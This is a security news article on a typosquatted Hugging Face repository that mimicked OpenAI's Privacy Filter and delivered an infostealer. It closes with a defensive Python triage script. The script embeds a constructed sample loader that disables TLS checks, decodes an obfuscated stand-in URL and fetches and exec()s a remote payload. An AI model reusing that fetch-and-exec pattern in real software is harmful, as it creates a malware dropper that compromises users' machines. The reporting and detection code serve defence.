Fake OpenAI Privacy Filter downloaded 244K
- HiddenLayer researchers said on May 7 they found a malicious Hugging Face repository impersonating OpenAI's Privacy Filter model and distributing infostealer malware.
- HiddenLayer said the fake Open-OSS/privacy-filter repo reached about 244,000 downloads and 667 likes in under 18 hours before removal.
- Hugging Face's security documentation says malware scanning runs on each commit, and HiddenLayer published indicators and cleanup steps.
HiddenLayer said on May 7 that it found malicious code in a Hugging Face repository called Open-OSS/privacy-filter that impersonated OpenAI's legitimate Privacy Filter model and delivered infostealer malware to users who ran its files. The security firm said the repository copied OpenAI's model card almost verbatim and climbed into Hugging Face's trending listings before the platform removed it. Hugging Face's documentation says the platform scans repository files for malware on each commit and warns users when files are flagged as unsafe. OpenAI's real model, published under the openai/privacy-filter namespace, remains live on Hugging Face.

### Which repository was fake, and what was it imitating?

Open-OSS/privacy-filter was the repository HiddenLayer identified as malicious, according to the firm's May 7 report. HiddenLayer described the project as a typosquat of OpenAI's legitimate privacy-filter release: the model name was identical and only the organization namespace differed (Open-OSS rather than openai), and the fake copied the authentic model page's text closely enough to look credible to developers browsing Hugging Face. (hiddenlayer.com)

OpenAI's official page is hosted as openai/privacy-filter on Hugging Face. That model is described there as a token-classification system for detecting and masking personally identifiable information in text, with example code showing standard Transformers loading commands.

### How far did the fake model spread before it was removed?

HiddenLayer said the malicious repository reached the No. 1 trending position on Hugging Face with about 244,000 downloads and 667 likes in under 18 hours. The firm's researchers assessed those numbers as "almost certainly artificially inflated" to make the repository appear legitimate. (hiddenlayer.com) BleepingComputer, citing HiddenLayer, also reported that the repository briefly reached the top spot on Hugging Face before the platform responded to reports and removed it. (bleepingcomputer.com)
Hugging Face's public documentation does not describe this specific incident, but it does say repositories are scanned for malware and can be marked unsafe if suspicious files are detected. (huggingface.co)

### What did the malicious files do on a victim's machine?

HiddenLayer said the fake repository's README told users to clone the project and run `start.bat` on Windows or `python loader.py` on Linux and macOS. The firm's analysis said the `loader.py` script first displayed decoy behavior and then called a function that disabled SSL verification, decoded an obfuscated remote URL and fetched a command payload from it. (bleepingcomputer.com) The May 7 report said the malware chain ultimately deployed an infostealer on Windows machines. The instructions themselves were the tell: the legitimate model page shows only standard Transformers loading code, and a model repository that asks users to execute a batch file or a standalone loader script is requesting far more than a model needs.

HiddenLayer said affected users should treat the host as fully compromised if they executed files from the repository on Windows, and the firm recommended reimaging the system rather than attempting cleanup. (hiddenlayer.com)

### Who was most at risk from the download?

Windows users who cloned Open-OSS/privacy-filter and executed `start.bat`, `python loader.py` or other repository files faced the clearest risk, HiddenLayer said. The firm said victims should assume saved passwords, session cookies, OAuth tokens, SSH keys, Discord tokens and cryptocurrency wallet data may have been stolen. (hiddenlayer.com) HiddenLayer said users should isolate affected machines, avoid logging into accounts from those systems, rotate credentials stored on the host and move cryptocurrency funds to wallets created on clean devices. Those steps came from the firm's published response guidance for anyone who ran the repository's files. Because stolen session cookies and OAuth tokens stay valid after a password change, rotation should include revoking active sessions and tokens, not just setting new passwords.

### What does Hugging Face say about its defenses?

Hugging Face says in its security documentation that it runs every repository file through a malware scanner and triggers scanning on each commit. The company says repositories with unsafe files can display warnings to users until suspicious content is removed. (huggingface.co)
The platform's live page for OpenAI's official privacy-filter model shows a separate, legitimate repository under OpenAI's verified namespace. That page includes usage examples and model details that HiddenLayer said the fake repository copied as part of the lure. (hiddenlayer.com)

### Where can affected users check next?

HiddenLayer published indicators of compromise and response guidance in its May 7 report on the Open-OSS/privacy-filter repository. (hiddenlayer.com) Hugging Face's security documentation also describes how unsafe files are labeled on the platform, while OpenAI's official model page remains the reference point for the legitimate privacy-filter release. (huggingface.co)
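The loader behaviour described above (decoy output, then TLS verification disabled, a base64-obfuscated URL decoded and a payload fetched and executed) is the kind of thing a static pre-run check can surface before anyone types `python loader.py`. The following is an added example, not code from HiddenLayer, Hugging Face or OpenAI: it parses a loader script with Python's `ast` module without importing or executing it, decodes base64 string literals so the hidden URL appears in plain text in the report, and checks the repository id against the publisher namespace you expect. `SAMPLE_LOADER` and `SAMPLE_LEGIT` are constructed stand-ins; the first only imitates the behaviour the analysis describes and points at the unresolvable `example.invalid`, and the second is a generic Transformers-style load, not text copied from OpenAI's page.

```python
"""Offline triage of a cloned model repository before anything in it is run.

Added example, not code from HiddenLayer, Hugging Face or OpenAI. The samples
are constructed stand-ins; nothing here executes the scanned source.
"""
import ast
import base64

# Constructed sample imitating the described loader: decoy output, TLS checks
# disabled, an obfuscated URL, a remote payload fetched and exec'd. The base64
# literal is built here so the decoded value is known to be this harmless URL.
_HIDDEN_URL = "https://example.invalid/c"
_ENCODED_URL = base64.b64encode(_HIDDEN_URL.encode()).decode()
SAMPLE_LOADER = f'''
import base64, ssl, urllib.request
print("Loading privacy-filter weights...")   # decoy output shown to the user
def _fetch():
    ssl._create_default_https_context = ssl._create_unverified_context
    url = base64.b64decode("{_ENCODED_URL}").decode()
    return urllib.request.urlopen(url).read()
exec(_fetch())
'''

# Constructed benign sample: a plain Transformers-style load for contrast.
SAMPLE_LEGIT = '''
from transformers import pipeline
pii = pipeline("token-classification", model="openai/privacy-filter")
'''


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _finding(node, kind, detail):
    return {"line": node.lineno, "kind": kind, "detail": detail}


def triage_python_source(src, filename="loader.py"):
    """Static scan of one Python file; returns a list of findings."""
    tree = ast.parse(src, filename=filename)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign):
            for target in node.targets:
                if _dotted_name(target) == "ssl._create_default_https_context":
                    findings.append(_finding(node, "tls_disabled",
                                             "process-wide HTTPS context overridden"))
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name == "ssl._create_unverified_context":
            findings.append(_finding(node, "tls_disabled", "unverified SSL context created"))
        for kw in node.keywords:
            if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                findings.append(_finding(node, "tls_disabled", "verify=False passed to a request"))
        # Decode base64 literals so the report shows what the author was hiding.
        if name in ("base64.b64decode", "b64decode") and node.args \
                and isinstance(node.args[0], ast.Constant) \
                and isinstance(node.args[0].value, (str, bytes)):
            try:
                hidden = base64.b64decode(node.args[0].value).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError
                hidden = "<not valid base64>"
            findings.append(_finding(node, "obfuscated_literal", hidden))
        if name in ("exec", "eval", "compile"):
            findings.append(_finding(node, "dynamic_exec", f"{name}() on runtime data"))
        if name in ("urllib.request.urlopen", "urlopen", "requests.get", "requests.post"):
            findings.append(_finding(node, "remote_fetch", f"{name}() at runtime"))
    return findings


def verdict(findings):
    """A model loader never needs exec() or disabled TLS: treat those as hostile."""
    kinds = {f["kind"] for f in findings}
    if "dynamic_exec" in kinds or "tls_disabled" in kinds:
        return "block"
    return "review" if kinds else "clean"


def check_repo_id(repo_id, expected_org):
    """The lure copies the model name; pin the publisher namespace instead."""
    org, _, _name = repo_id.partition("/")
    if org.lower() == expected_org.lower():
        return True, f"namespace {org!r} matches expected publisher"
    return False, f"namespace {org!r} is not {expected_org!r}; a matching model name is not a trust signal"


if __name__ == "__main__":
    ok, why = check_repo_id("Open-OSS/privacy-filter", expected_org="openai")
    print(f"repo check: {'ok' if ok else 'MISMATCH'} ({why})")
    findings = triage_python_source(SAMPLE_LOADER)
    for f in sorted(findings, key=lambda f: f["line"]):
        print(f"line {f['line']}: {f['kind']}: {f['detail']}")
    print("verdict:", verdict(findings))
    print("benign sample verdict:", verdict(triage_python_source(SAMPLE_LEGIT)))
```

Run it over every `.py` file in a cloned repository before executing anything; a `block` verdict on a loader, or a namespace mismatch against the publisher you meant to download from, is reason to stop. The check is deliberately static: the decoy output in the real loader was there to buy time after execution, and no amount of sandboxed running is a substitute for not running unknown code on a machine that holds SSH keys and browser sessions.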